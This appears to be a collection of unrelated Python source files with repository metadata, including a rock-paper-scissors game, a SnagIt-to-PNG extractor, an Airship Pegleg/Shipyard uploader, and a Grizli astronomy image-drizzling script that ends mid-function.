4 financial service 011:0300 ...
<BLANKLINE>
[5 rows x 5 columns]
"""
from .co_occurrence_network_communities import co_occurrence_network_communities
def thematic_map_communities(
column,
min_occ=2,
directory="./",
):
return co_occurrence_network_communities(
column=column,
min_occ=min_occ,
max_occ=None,
normalization="association",
clustering_method="louvain",
manifold_method=None,
directory=directory,
)
| 28.906977
| 80
| 0.513274
|
4a1899f900f5f1acf415fb1945bb8a8884a3da3b
| 2,307
|
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/rock_paper_scissors.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 71
|
2019-03-05T04:44:48.000Z
|
2022-03-24T09:47:48.000Z
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/rock_paper_scissors.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 8
|
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/01_intro_python/Intro-Python-II/examples/rock_paper_scissors.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 37
|
2019-03-07T05:08:03.000Z
|
2022-01-05T11:32:51.000Z
|
#import module we need
import random
#file i/o functions for historical results
def load_results():
text_file = open("history.txt", "r")
history = text_file.read().split(",")
text_file.close()
return history
def save_results( w, t, l):
text_file = open("history.txt", "w")
text_file.write( str(w) + "," + str(t) + "," + str(l))
text_file.close()
#welcome message
results = load_results()
wins = int(results[0])
ties = int( results[1])
losses = int(results[2])
print("Welcome to Rock, Paper, Scissors!")
print("Wins: %s, Ties: %s, Losses: %s" % (wins, ties, losses))
print("Please choose to continue...")
#initialize user, computer choices
computer = random.randint(1,3)
user = int(input("[1] Rock [2] Paper [3] Scissors [9] Quit\n"))
#gamplay loop
while not user == 9:
#user chooses ROCK
if user == 1:
if computer == 1:
print("Computer chose rock...tie!")
ties += 1
elif computer == 2:
print("Computer chose paper...computer wins :(")
losses += 1
else:
print("Computer chose scissors...you wins :)")
wins += 1
#user chooses PAPER
elif user == 2:
if computer == 1:
print("Computer chose rock...you win :)")
wins += 1
elif computer == 2:
print("Computer chose paper...tie!")
ties += 1
else:
print("Computer chose scissors...computer wins :(")
losses += 1
#user chooses SCISSORS
elif user == 3:
if computer == 1:
print("Computer chose rock...computer wins :(")
losses += 1
elif computer == 2:
print("Computer chose paper...you win :)")
wins += 1
else:
print("Computer chose scissors...tie!")
ties += 1
else:
print("Invalid selection. Please try again.")
#print updated stats
print("Wins: %s, Ties: %s, Losses: %s" % (wins, ties, losses))
#prompt user to make another selection
print("Please choose to continue...")
#initialize user, computer choices
computer = random.randint(1,3)
user = int(input("[1] Rock [2] Paper [3] Scissors [9] Quit\n"))
# #game over, save results
save_results(wins, ties, losses)
| 29.202532
| 73
| 0.563069
|
4a189aca08c61354ecc310501a4b7b8d459d7dac
| 381
|
py
|
Python
|
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
ores/wsgi/routes/v1/__init__.py
|
wikimedia/mediawiki-services-ores
|
13be375f9aef4f90a3f8b82bd68812ca69c8dad1
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import scores
from . import spec
def configure(config, bp, score_processor):
@bp.route("/v1/", methods=["GET"])
def v1_index():
return render_template("swagger-ui.html", swagger_spec="/v1/spec/")
bp = scores.configure(config, bp, score_processor)
bp = spec.configure(config, bp, score_processor)
return bp
| 22.411765
| 75
| 0.690289
|
4a189ad44181841cd06d70e2791a0849241842ce
| 3,801
|
py
|
Python
|
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
snagittopng.py
|
ravisayal/SnagItToPNG
|
16df7f68e62b07b0dd05f1a8cb819dc0a98640fa
|
[
"MIT"
] | null | null | null |
# Converts the SNAGIT raw capture to PNG
# this does not copy the SNAG IT annotations
# use SNAGIT Batch conversion tool to convert with Annotations
import os
import time
import datetime
from ctypes import create_unicode_buffer, windll, wintypes, byref
from bitstring import ConstBitStream
# get the file creation date/time
def get_ctime(filepath, verbose="n"):
if verbose == "y":
print ("filepath: " + filepath)
created = os.path.getctime(filepath)
return created
# get the file last modified date/time
def get_mtime(filepath, verbose="n"):
if verbose == "y":
print ("filepath: " + filepath)
modified = os.path.getmtime(filepath)
return modified
# update file creation date/time
def update_ctime(filepath, epoch, verbose="n"):
if verbose == "y":
print (filepath + " updating create time to: " + epoch)
# Convert Unix timestamp to Windows FileTime using some magic numbers
# See documentation: https://support.microsoft.com/en-us/help/167296
timestamp = int((epoch * 10000000) + 116444736000000000)
ctime = wintypes.FILETIME(timestamp & 0xFFFFFFFF, timestamp >> 32)
# Call Win32 API to modify the file creation date
handle = windll.kernel32.CreateFileW(filepath, 256, 0, None, 3, 128, None)
windll.kernel32.SetFileTime(handle, byref(ctime), None, None)
windll.kernel32.CloseHandle(handle)
if verbose == "y":
print("file create date updated")
# update file last modified date/time
def update_mtime(filepath, epoch, verbose="n"):
if verbose == "y":
print (filepath + " updating last modified time to: " + epoch)
os.utime(filepath, (epoch, epoch))
if verbose == "y":
print("file last modified date updated")
# SNAGIT Screenshot folder
Local_App_Data = os.environ['LOCALAPPDATA']
directory = Local_App_Data+r"\TechSmith\Snagit\DataStore" + "\\"
# Current Folder
# directory = ".\\"
for filename in os.listdir(directory):
if filename.endswith(".SNAG"):
filepath = directory + filename
file_create_date = get_ctime(filepath)
file_modified_date = get_mtime(filepath)
print("Processing %s %d %d" % (filepath,
file_create_date,
file_modified_date))
# initialise bitstream using filename
# it Can be initialise from files, bytes, etc.
s = ConstBitStream(filename=filepath)
# look for PNG Start and End Markers in SNAGIT File
# Start marker ‰PNG
# end marker END®B`‚
start = s.find('0x89504E47', bytealigned=True)
end = s.find('0x454E44AE426082', bytealigned=True)
assert start, "PNG Header not found"
assert end, "PNG Terminator not found"
start_off = int(start[0] / 8)
end_off = int(end[0] / 8)
# calculate content length, add 7 bytes to end-offset
# as it is starting location of PNG end marker
content_len = end_off - start_off + 7
# Now with correct start offset and content length
# read the file in binary mode and copy the content
# to new file
# File read operation start
file = open(filepath, "rb")
file.seek(start_off, 0)
pngdata = file.read(content_len)
file.close()
# File read operation end
# write the content to new file with png extension
filepath_dest = filepath + ".png"
destfile = open(filepath_dest, "wb")
destfile.write(pngdata)
destfile.close()
# update the file create and last modified date time
# to match original file
update_ctime(filepath_dest, file_create_date)
update_mtime(filepath_dest, file_modified_date)
else:
continue
| 31.413223
| 78
| 0.648777
|
4a189b2ffb7963aee34900403051e91660b7d404
| 7,053
|
py
|
Python
|
pegleg/engine/util/shipyard_helper.py
|
openstack/airship-pegleg
|
cbc87967ebd572463a893b03097b615b99d9dbcf
|
[
"Apache-2.0"
] | 9
|
2018-06-20T20:16:29.000Z
|
2019-03-24T23:07:25.000Z
|
pegleg/engine/util/shipyard_helper.py
|
openstack/airship-pegleg
|
cbc87967ebd572463a893b03097b615b99d9dbcf
|
[
"Apache-2.0"
] | 8
|
2020-11-16T16:22:58.000Z
|
2021-05-14T13:29:45.000Z
|
pegleg/engine/util/shipyard_helper.py
|
airshipit/pegle
|
772d3a47a6db425be8249f770a732dbad4e00b08
|
[
"Apache-2.0"
] | 2
|
2020-03-02T13:53:53.000Z
|
2021-07-19T05:02:13.000Z
|
# Copyright 2018 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import uuid
from shipyard_client.api_client.shipyard_api_client import ShipyardClient
from shipyard_client.api_client.shipyardclient_context import \
ShipyardClientContext
import yaml
from pegleg.engine import exceptions
from pegleg.engine import site
from pegleg.engine.util import files
from pegleg.engine.util.files import add_representer_ordered_dict
from pegleg.engine.util.pegleg_secret_management import PeglegSecretManagement
LOG = logging.getLogger(__name__)
class AuthValuesError(exceptions.PeglegBaseException):
"""Shipyard authentication failed. """
def __init__(self, *, diagnostic):
self.diagnostic = diagnostic
class DocumentUploadError(exceptions.PeglegBaseException):
"""Exception occurs while uploading documents"""
def __init__(self, message):
self.message = message
class ShipyardHelper(object):
"""
A helper class for Shipyard. It performs the following operation:
1. Validates the authentication parameters required for Keystone
2. Uploads the document to Shipyard buffer
3. Commits the document
4. Formats response from Shipyard api_client
"""
def __init__(self, context, buffer_mode='replace'):
"""
Initializes params to be used by Shipyard
:param context: ShipyardHelper context object that contains
params for initializing ShipyardClient with
correct client context and the site_name.
"""
self.ctx = context
self.api_parameters = self.ctx.obj['API_PARAMETERS']
self.auth_vars = self.api_parameters.get('auth_vars')
self.context_marker = self.ctx.obj['context_marker']
if self.context_marker is None:
self.context_marker = str(uuid.uuid4())
LOG.debug("context_marker is %s", self.context_marker)
self.site_name = self.ctx.obj['site_name']
self.client_context = ShipyardClientContext(
self.auth_vars, self.context_marker)
self.api_client = ShipyardClient(self.client_context)
self.buffer_mode = buffer_mode
self.collection = self.ctx.obj.get('collection', self.site_name)
def upload_documents(self):
"""Uploads documents to Shipyard"""
collected_documents = files.collect_files_by_repo(self.site_name)
collection_data = [site.get_deployment_data_doc(self.site_name)]
LOG.info("Processing %d collection(s)", len(collected_documents))
for idx, document in enumerate(collected_documents):
# Decrypt the documents if encrypted
pegleg_secret_mgmt = PeglegSecretManagement(
docs=collected_documents[document])
decrypted_documents = pegleg_secret_mgmt.get_decrypted_secrets()
collection_data.extend(decrypted_documents)
add_representer_ordered_dict()
collection_as_yaml = yaml.dump_all(
collection_data, Dumper=yaml.SafeDumper)
# Append flag is not required for the first
# collection being uploaded to Shipyard. It
# is needed for subsequent collections.
if self.buffer_mode in ['append', 'replace']:
buffer_mode = self.buffer_mode
else:
raise exceptions.InvalidBufferModeException()
try:
self.validate_auth_vars()
resp_text = self.api_client.post_configdocs(
collection_id=self.collection,
buffer_mode=buffer_mode,
document_data=collection_as_yaml)
except AuthValuesError as ave:
resp_text = "Error: {}".format(ave.diagnostic)
raise DocumentUploadError(resp_text)
except Exception as ex:
resp_text = (
"Error: Unable to invoke action due to: {}".format(str(ex)))
LOG.debug(resp_text, exc_info=True)
raise DocumentUploadError(resp_text)
# FIXME: Standardize status_code in Deckhand to avoid this
# workaround.
code = 0
if hasattr(resp_text, 'status_code'):
code = resp_text.status_code
elif hasattr(resp_text, 'code'):
code = resp_text.code
if code >= 400:
if hasattr(resp_text, 'content'):
raise DocumentUploadError(resp_text.content)
else:
raise DocumentUploadError(resp_text)
else:
output = self.formatted_response_handler(resp_text)
LOG.info("Uploaded document in buffer %s ", output)
# Commit in the last iteration of the loop when all the documents
# have been pushed to Shipyard buffer.
return self.commit_documents()
def commit_documents(self):
"""Commit Shipyard buffer documents """
LOG.info("Commiting Shipyard buffer documents")
try:
resp_text = self.formatted_response_handler(
self.api_client.commit_configdocs())
except Exception as ex:
resp_text = (
"Error: Unable to invoke action due to: {}".format(str(ex)))
raise DocumentUploadError(resp_text)
return resp_text
def validate_auth_vars(self):
"""Checks that the required authorization varible have been entered"""
required_auth_vars = ['auth_url']
err_txt = []
for var in required_auth_vars:
if self.auth_vars[var] is None:
err_txt.append(
'Missing the required authorization variable: '
'--os-{}'.format(var.replace('_', '-')))
if err_txt:
for var in self.auth_vars:
if (self.auth_vars.get(var) is None
and var not in required_auth_vars):
err_txt.append(
'- Also not set: --os-{}'.format(
var.replace('_', '-')))
raise AuthValuesError(diagnostic='\n'.join(err_txt))
def formatted_response_handler(self, response):
"""Base format handler for either json or yaml depending on call"""
call = response.headers['Content-Type']
if 'json' in call:
try:
return json.dumps(response.json(), indent=4)
except ValueError:
return (
"This is not json and could not be printed as such. \n"
+ response.text)
| 39.623596
| 78
| 0.648093
|
4a189be46a31d057bf2d9d78522d3a9377d60cf1
| 31,953
|
py
|
Python
|
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | 1
|
2019-12-23T02:07:20.000Z
|
2019-12-23T02:07:20.000Z
|
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | null | null | null |
grizli/aws/aws_drizzler.py
|
zhangxinnaoc/grizli
|
2d9f5f838db6ff0992d9731c399729e9e7dcfe83
|
[
"MIT"
] | null | null | null |
#!/bin/env python
import inspect
def make_visit_fits():
import glob
import numpy as np
from grizli import utils
visit_files = glob.glob('[egu]*visits.npy')
visit_files.sort()
all_visits = []
products = []
for file in visit_files:
visits, groups, info = np.load(file)
for v in visits:
has_fp = ('footprints' in v)
if not has_fp:
print('No footprint: {0}'.format(v['product']))
if has_fp & (v['product'] not in products):
all_visits.append(v)
products.append(v['product'])
# WFC3/IR copied to "Exposures" paths
for visit in all_visits:
visit['filter'] = visit['product'].split('-')[-1]
for v in all_visits:
if v['filter'].startswith('f0') | v['filter'].startswith('f1'):
#print(v['product'])
v['awspath'] = ['grizli-v1/Exposures/{0}/{1}'.format(f[:4], f.split('_')[0]) for f in v['files']]
tab = utils.GTable()
for k in ['product', 'filter']:
tab[k] = [visit[k] for visit in all_visits]
coo = np.array([np.array(visit['footprint'].centroid.xy).flatten() for visit in all_visits])
tab['ra'] = coo[:,0]
tab['dec'] = coo[:,1]
tab['nexp'] = [len(visit['files']) for visit in all_visits]
root = 'candels-july2019'
root = 'candels-sep2019'
tab.write(root+'_visits.fits', overwrite=True)
np.save(root+'_visits.npy', [all_visits])
os.system('echo "# In https://s3.amazonaws.com/grizli-v1/Mosaics/" > candels-july2019.files.txt; ls candels-july2019* |grep -v files.txt >> candels-july2019.files.txt')
os.system('aws s3 sync --exclude "*" --include "candels-july2019*" ./ s3://grizli-v1/Mosaics/ --acl public-read')
def group_by_filter():
"""
aws s3 sync --exclude "*" --include "cosmos_visits*" s3://grizli-preprocess/CosmosMosaic/ ./
"""
from grizli import prep, utils
import numpy as np
master='cosmos'
master='grizli-jan2019'
tab = utils.read_catalog('{0}_visits.fits'.format(master))
all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]
# By filter
# Exclude DASH
dash = utils.column_string_operation(tab['product'], 'icxe', 'startswith')
# Don't exclude DASH
dash = utils.column_string_operation(tab['product'], 'xxxx', 'startswith')
groups = {}
fpstr = {}
for filt in np.unique(tab['filter']):
mat = (tab['filter'] == filt) & (~dash)
groups[filt] = {'filter':filt, 'files':[], 'awspath':[], 'footprints':[]}
fpstr[filt] = 'fk5\n'
for ix in np.where(mat)[0]:
fp = all_visits[ix]['footprint']
if hasattr(fp, '__len__'):
fps = fp
else:
fps = [fp]
for fp in fps:
xy = fp.boundary.xy
pstr = 'polygon('+','.join(['{0:.6f}'.format(i) for i in np.array([xy[0].tolist(), xy[1].tolist()]).T.flatten()])+') # text={{{0}}}\n'.format(all_visits[ix]['product'])
fpstr[filt] += pstr
for k in ['files', 'awspath','footprints']:
groups[filt][k].extend(all_visits[ix][k])
fp = open('{0}-pointings-{1}.reg'.format(master, filt),'w')
fp.write(fpstr[filt])
fp.close()
print('{0:6} {1:>3d} {2:>4d} ({3:>4d})'.format(filt, mat.sum(), len(groups[filt]['files']), len(np.unique(groups[filt]['files']))))
np.save('{0}_filter_groups.npy'.format(master), [groups])
# RGB_PARAMS = {'xsize':4, 'rgb_min':-0.01, 'verbose':True, 'output_dpi': None, 'add_labels':False, 'output_format':'png', 'show_ir':False, 'scl':2, 'suffix':'.rgb', 'mask_empty':False}
RGB_PARAMS = {'xsize':4,
'output_dpi': None,
'rgb_min':-0.01,
'add_labels':False,
'output_format':'png',
'show_ir':False,
'scl':2,
'suffix':'.rgb',
'mask_empty':False,
'tick_interval':1,
'pl':1, # 1 for f_lambda, 2 for f_nu
}
#xsize=4, output_dpi=None, HOME_PATH=None, show_ir=False, pl=1, pf=1, scl=1, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=all_filters, add_labels=False, output_format='png', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.rgb', scale_ab=scale_ab)
def segmentation_figure(label, cat, segfile):
"""
Make a figure showing a cutout of the segmentation file
"""
import matplotlib.pyplot as plt
import numpy as np
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from grizli import utils
plt.ioff()
seg = pyfits.open(segfile)
seg_data = seg[0].data
seg_wcs = pywcs.WCS(seg[0].header)
# Randomize seg to get dispersion between neighboring objects
np.random.seed(hash(label.split('_')[0]) % (10 ** 8))
rnd_ids = np.append([0], np.argsort(np.random.rand(len(cat)))+1)
# Make cutout
th = pyfits.open('{0}.thumb.fits'.format(label), mode='update')
th_wcs = pywcs.WCS(th[0].header)
blot_seg = utils.blot_nearest_exact(seg_data, seg_wcs, th_wcs,
stepsize=-1, scale_by_pixel_area=False)
rnd_seg = rnd_ids[np.cast[int](blot_seg)]*1.
th_ids = np.unique(blot_seg)
sh = th[0].data.shape
yp, xp = np.indices(sh)
thumb_height = 2.
fig = plt.figure(figsize=[thumb_height*sh[1]/sh[0], thumb_height])
ax = fig.add_subplot(111)
rnd_seg[rnd_seg == 0] = np.nan
ax.imshow(rnd_seg, aspect='equal', cmap='terrain_r',
vmin=-0.05*len(cat), vmax=1.05*len(cat))
ax.set_xticklabels([])
ax.set_yticklabels([])
ix = utils.column_values_in_list(cat['number'], th_ids)
xc, yc = th_wcs.all_world2pix(cat['ra'][ix], cat['dec'][ix], 0)
xc = np.clip(xc, 0.09*sh[1], 0.91*sh[1])
yc = np.clip(yc, 0.08*sh[0], 0.92*sh[0])
for th_id, x_i, y_i in zip(cat['number'][ix], xc, yc):
if th_id == 0:
continue
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='w')
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='k', alpha=0.95)
ax.set_xlim(0, sh[1]-1)
ax.set_ylim(0, sh[0]-1)
ax.set_axis_off()
fig.tight_layout(pad=0.01)
fig.savefig('{0}.seg.png'.format(label))
plt.close(fig)
# Append to thumbs file
seg_hdu = pyfits.ImageHDU(data=np.cast[int](blot_seg), name='SEG')
if 'SEG' in th:
th.pop('SEG')
th.append(seg_hdu)
th.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
th.close()
def drizzle_images(label='macs0647-jd1', ra=101.9822125, dec=70.24326667, pixscale=0.1, size=10, wcs=None, pixfrac=0.33, kernel='square', theta=0, half_optical_pixscale=True, filters=['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m', 'f850lp', 'f814w', 'f775w', 'f606w', 'f475w', 'f555w', 'f600lp', 'f390w', 'f350lp'], remove=True, rgb_params=RGB_PARAMS, master='grizli-jan2019', aws_bucket='s3://grizli/CutoutProducts/', scale_ab=21, thumb_height=2.0, sync_fits=True, subtract_median=True, include_saturated=True, include_ir_psf=False, show_filters=['visb', 'visr', 'y', 'j', 'h'], combine_similar_filters=True, single_output=True, aws_prep_dir=None, make_segmentation_figure=False, get_dict=False, **kwargs):
"""
label='cp561356'; ra=150.208875; dec=1.850241667; size=40; filters=['f160w','f814w', 'f140w','f125w','f105w','f606w','f475w']
"""
import glob
import copy
import os
import numpy as np
import astropy.io.fits as pyfits
from astropy.coordinates import SkyCoord
import astropy.units as u
from drizzlepac.adrizzle import do_driz
import boto3
from grizli import prep, utils
from grizli.pipeline import auto_script
# Function arguments
if get_dict:
frame = inspect.currentframe()
args = inspect.getargvalues(frame).locals
pop_args = ['get_dict', 'frame', 'kwargs']
pop_classes = (np.__class__, do_driz.__class__, SkyCoord.__class__)
for k in kwargs:
args[k] = kwargs[k]
for k in args:
if isinstance(args[k], pop_classes):
pop_args.append(k)
for k in pop_args:
if k in args:
args.pop(k)
return args
# Boto objects
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
if isinstance(ra, str):
coo = SkyCoord('{0} {1}'.format(ra, dec), unit=(u.hour, u.deg))
ra, dec = coo.ra.value, coo.dec.value
if label is None:
try:
import mastquery.utils
label = mastquery.utils.radec_to_targname(ra=ra, dec=dec, round_arcsec=(1/15, 1), targstr='j{rah}{ram}{ras}{sign}{ded}{dem}{des}')
except:
label = 'grizli-cutout'
#master = 'cosmos'
#master = 'grizli-jan2019'
if master == 'grizli-jan2019':
parent = 's3://grizli/MosaicTools/'
bkt = s3.Bucket('grizli')
elif master == 'cosmos':
parent = 's3://grizli-preprocess/CosmosMosaic/'
bkt = s3.Bucket('grizli-preprocess')
elif master == 'grizli-cosmos-v2':
parent = 's3://grizli-cosmos-v2/Mosaics/'
bkt = s3.Bucket('grizli-cosmos-v2')
elif master == 'candels-july2019':
parent = 's3://grizli-v1/Mosaics/'
bkt = s3.Bucket('grizli-v1')
else:
# Run on local files, e.g., "Prep" directory
parent = None
#remove = False
for ext in ['_visits.fits', '_visits.npy', '_filter_groups.npy'][-1:]:
if (not os.path.exists('{0}{1}'.format(master, ext))) & (parent is not None):
s3_path = parent.split('/')[-2]
s3_file = '{0}{1}'.format(master, ext)
print('{0}{1}'.format(parent, s3_file))
bkt.download_file(s3_path+'/'+s3_file, s3_file,
ExtraArgs={"RequestPayer": "requester"})
#os.system('aws s3 cp {0}{1}{2} ./'.format(parent, master, ext))
#tab = utils.read_catalog('{0}_visits.fits'.format(master))
#all_visits = np.load('{0}_visits.npy'.format(master))[0]
if parent is not None:
groups = np.load('{0}_filter_groups.npy'.format(master), allow_pickle=True)[0]
else:
if aws_prep_dir is not None:
spl = aws_prep_dir.replace('s3://','').split('/')
prep_bucket = spl[0]
prep_root = spl[2]
prep_bkt = s3.Bucket(prep_bucket)
s3_prep_path = 'Pipeline/{0}/Prep/'.format(prep_root)
s3_full_path = '{0}/{1}'.format(prep_bucket, s3_prep_path)
s3_file = '{0}_visits.npy'.format(prep_root)
# Make output path Prep/../Thumbnails/
if aws_bucket is not None:
aws_bucket = 's3://'+s3_full_path.replace('/Prep/', '/Thumbnails/')
print('{0}{1}'.format(s3_prep_path, s3_file))
if not os.path.exists(s3_file):
prep_bkt.download_file(os.path.join(s3_prep_path, s3_file),
s3_file, ExtraArgs={"RequestPayer": "requester"})
groups_files = glob.glob('{0}_filter_groups.npy'.format(prep_root))
visit_query = prep_root+'_'
else:
groups_files = glob.glob('*filter_groups.npy')
visit_query = '*'
# Reformat local visits.npy into a groups file
if (len(groups_files) == 0):
visit_file = glob.glob(visit_query+'visits.npy')[0]
visits, groups, info = np.load(visit_file, allow_pickle=True)
visit_root = visit_file.split('_visits')[0]
visit_filters = np.array([v['product'].split('-')[-1] for v in visits])
groups = {}
for filt in np.unique(visit_filters):
groups[filt] = {}
groups[filt]['filter'] = filt
groups[filt]['files'] = []
groups[filt]['footprints'] = []
groups[filt]['awspath'] = []
ix = np.where(visit_filters == filt)[0]
for i in ix:
groups[filt]['files'].extend(visits[i]['files'])
groups[filt]['footprints'].extend(visits[i]['footprints'])
Nf = len(groups[filt]['files'])
print('{0:>6}: {1:>3} exposures'.format(filt, Nf))
if aws_prep_dir is not None:
groups[filt]['awspath'] = [s3_full_path
for file in range(Nf)]
np.save('{0}_filter_groups.npy'.format(visit_root), [groups])
else:
groups = np.load(groups_files[0], allow_pickle=True)[0]
#filters = ['f160w','f814w', 'f110w', 'f098m', 'f140w','f125w','f105w','f606w', 'f475w']
has_filts = []
lower_filters = [f.lower() for f in filters]
for filt in lower_filters:
if filt not in groups:
continue
visits = [copy.deepcopy(groups[filt])]
#visits[0]['reference'] = 'CarlosGG/ak03_j1000p0228/Prep/ak03_j1000p0228-f160w_drz_sci.fits'
visits[0]['product'] = label+'-'+filt
if wcs is None:
hdu = utils.make_wcsheader(ra=ra, dec=dec, size=size, pixscale=pixscale, get_hdu=True, theta=theta)
h = hdu.header
else:
h = utils.to_header(wcs)
if (filt[:2] in ['f0', 'f1', 'g1']) | (not half_optical_pixscale):
#data = hdu.data
pass
else:
for k in ['NAXIS1','NAXIS2','CRPIX1','CRPIX2']:
h[k] *= 2
h['CRPIX1'] -= 0.5
h['CRPIX2'] -= 0.5
for k in ['CD1_1', 'CD1_2', 'CD2_1', 'CD2_2']:
if k in h:
h[k] /= 2
#data = np.zeros((h['NAXIS2'], h['NAXIS1']), dtype=np.int16)
#pyfits.PrimaryHDU(header=h, data=data).writeto('ref.fits', overwrite=True, output_verify='fix')
#visits[0]['reference'] = 'ref.fits'
print('\n\n###\nMake filter: {0}'.format(filt))
if (filt.upper() in ['F105W','F125W','F140W','F160W']) & include_ir_psf:
clean_i = False
else:
clean_i = remove
status = utils.drizzle_from_visit(visits[0], h, pixfrac=pixfrac, kernel=kernel, clean=clean_i, include_saturated=include_saturated)
if status is not None:
sci, wht, outh = status
if subtract_median:
#med = np.median(sci[sci != 0])
try:
un_data = np.unique(sci[(sci != 0) & np.isfinite(sci)])
med = utils.mode_statistic(un_data)
except:
med = 0.
if not np.isfinite(med):
med = 0.
print('\n\nMedian {0} = {1:.3f}\n\n'.format(filt, med))
outh['IMGMED'] = (med, 'Median subtracted from the image')
else:
med = 0.
outh['IMGMED'] = (0., 'Median subtracted from the image')
pyfits.writeto('{0}-{1}_drz_sci.fits'.format(label, filt),
data=sci, header=outh, overwrite=True,
output_verify='fix')
pyfits.writeto('{0}-{1}_drz_wht.fits'.format(label, filt),
data=wht, header=outh, overwrite=True,
output_verify='fix')
has_filts.append(filt)
if (filt.upper() in ['F105W','F125W','F140W','F160W']) & include_ir_psf:
from grizli.galfit.psf import DrizzlePSF
hdu = pyfits.open('{0}-{1}_drz_sci.fits'.format(label, filt),
mode='update')
flt_files = [] #visits[0]['files']
for i in range(1, 10000):
key = 'FLT{0:05d}'.format(i)
if key not in hdu[0].header:
break
flt_files.append(hdu[0].header[key])
dp = DrizzlePSF(flt_files=flt_files, driz_hdu=hdu[0])
psf = dp.get_psf(ra=dp.driz_wcs.wcs.crval[0],
dec=dp.driz_wcs.wcs.crval[1],
filter=filt.upper(),
pixfrac=dp.driz_header['PIXFRAC'],
kernel=dp.driz_header['KERNEL'],
wcs_slice=dp.driz_wcs, get_extended=True,
verbose=False, get_weight=False)
psf[1].header['EXTNAME'] = 'PSF'
#psf[1].header['EXTVER'] = filt
hdu.append(psf[1])
hdu.flush()
if remove:
os.system('rm *_fl*fits')
if combine_similar_filters:
combine_filters(label=label)
if len(has_filts) == 0:
return []
if rgb_params:
#auto_script.field_rgb(root=label, HOME_PATH=None, filters=has_filts, **rgb_params)
show_all_thumbnails(label=label, thumb_height=thumb_height, scale_ab=scale_ab, close=True, rgb_params=rgb_params, filters=show_filters)
if (single_output != 0):
# Concatenate into a single FITS file
files = glob.glob('{0}-f*_dr[cz]_sci.fits'.format(label))
files.sort()
if combine_similar_filters:
comb_files = glob.glob('{0}-[a-eg-z]*_dr[cz]_sci.fits'.format(label))
comb_files.sort()
files += comb_files
hdul = None
for file in files:
hdu_i = pyfits.open(file)
hdu_i[0].header['EXTNAME'] = 'SCI'
if 'NCOMBINE' in hdu_i[0].header:
if hdu_i[0].header['NCOMBINE'] <= single_output:
continue
filt_i = file.split('-')[-1].split('_dr')[0]
else:
filt_i = utils.get_hst_filter(hdu_i[0].header)
for h in hdu_i:
h.header['EXTVER'] = filt_i
if hdul is None:
hdul = pyfits.HDUList([h])
else:
hdul.append(h)
print('Add to {0}.thumb.fits: {1}'.format(label, file))
# Weight
hdu_i = pyfits.open(file.replace('_sci', '_wht'))
hdu_i[0].header['EXTNAME'] = 'WHT'
for h in hdu_i:
h.header['EXTVER'] = filt_i
if hdul is None:
hdul = pyfits.HDUList([h])
else:
hdul.append(h)
hdul.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
for file in files:
for f in [file, file.replace('_sci','_wht')]:
if os.path.exists(f):
print('Remove {0}'.format(f))
os.remove(f)
# Segmentation figure
thumb_file = '{0}.thumb.fits'.format(label)
if (make_segmentation_figure) & (os.path.exists(thumb_file)) & (aws_prep_dir is not None):
print('Make segmentation figure')
# Fetch segmentation image and catalog
s3_prep_path = 'Pipeline/{0}/Prep/'.format(prep_root)
s3_full_path = '{0}/{1}'.format(prep_bucket, s3_prep_path)
s3_file = '{0}_visits.npy'.format(prep_root)
has_seg_files = True
seg_files = ['{0}-ir_seg.fits.gz'.format(prep_root),
'{0}_phot.fits'.format(prep_root)]
for s3_file in seg_files:
if not os.path.exists(s3_file):
remote_file = os.path.join(s3_prep_path, s3_file)
try:
print('Fetch {0}'.format(remote_file))
prep_bkt.download_file(remote_file, s3_file,
ExtraArgs={"RequestPayer": "requester"})
except:
has_seg_files = False
print('Make segmentation figure failed: {0}'.format(remote_file))
break
if has_seg_files:
s3_cat = utils.read_catalog(seg_files[1])
segmentation_figure(label, s3_cat, seg_files[0])
if aws_bucket:
#aws_bucket = 's3://grizli-cosmos/CutoutProducts/'
#aws_bucket = 's3://grizli/CutoutProducts/'
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
